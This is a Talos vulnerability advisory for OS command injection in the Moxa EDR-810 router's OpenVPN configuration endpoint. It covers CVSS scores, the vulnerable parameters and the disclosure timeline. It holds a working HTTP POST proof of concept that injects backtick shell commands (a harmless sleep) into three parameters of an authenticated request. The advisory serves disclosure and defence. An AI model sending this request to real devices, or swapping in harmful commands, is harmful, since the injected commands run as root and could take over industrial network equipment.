Talos IntelligenceTALOS-2017-0482Moxa EDR-810 Web Server OpenVPN Config Multiple Command Injection Vulnerabilities
9 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
38.8%
Summary
An exploitable command injection vulnerability exists in the web server functionality of Moxa EDR-810 V4.1 build 17030317. A specially crafted HTTP POST can cause a privilege escalation resulting in root shell. An attacker can inject OS commands into various paramaters in the โ/goform/net_Web_get_valueโ uri to trigger this vulnerability.
Tested Versions
Moxa EDR-810 V4.1 build 17030317
Product URLs
<https://www.moxa.com/product/EDR-810.htm>
CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWE
CWE-78 - Improper Neutralization of Special Elements used in an OS Command (โOS Command Injectionโ)
Details
Once logged in to the deviceโs web interface, a user can configure OpenVPN via a POST to โ/goform/net_Web_get_valueโ. An attacker can inject commands via POST parameters. The web server is running as a root user, therefor injected commands will run as root.
CVE-2017-14432 - openvpnServer0_tmp
This following parameter is vulnerable to a command injection.
Vulnerable URI: /goform/net_Web_get_value
Vulnerable Parm: openvpnServer0_tmp=
CVE-2017-14433 - remoteNetwork0
This following parameter is vulnerable to a command injection.
Vulnerable URI: /goform/net_Web_get_value
Vulnerable Parm: remoteNetwork0=
CVE-2017-14434 - remoteNetmask0
This following parameter is vulnerable to a command injection.
Vulnerable URI: /goform/net_Web_get_value
Vulnerable Parm: remoteNetmask0=
Exploit Proof-of-Concept
In order to exploit this vulnerability the following POST request can be sent.
POST /goform/net_Web_get_value?SRV=SRV_OPENVPN_SERVER_USER HTTP/1.1
Host: 192.168.127.254
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.127.254/openvpn_user.asp
Cookie: NAME=admin; PASSWORD=1cf17e0c60ed7ecb0977fdfc0e218c65; AUTHORITY=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
openvpnServer0_tmp=AAAA%2Bvvvvv%2B%60sleep%2B10%60%2B%60sleep%2B10%60%2B&ovpnServerId=1&username0=AAAA&password0=vvvvv&password_c=vvvvv&remoteNetwork0=%60sleep%2B10%60&remoteNetmask0=%60sleep%2B10%60
Timeline
2017-11-15 - Vendor Disclosure
2017-11-19 - Vendor Acknowledged
2017-12-25 - Vendor provided timeline for fix (Feb 2018)
2018-01-04 - Timeline pushed to mid-March per vendor
2018-03-24 - Talos follow up with vendor for release timeline
2018-03-26 - Timeline pushed to 4/13/18 per vendor
2018-04-12 - Vendor patched & published new firmware on website
2018-04-13 - Public Release
Related
9 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:S/C:C/I:C/A:C
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
38.8%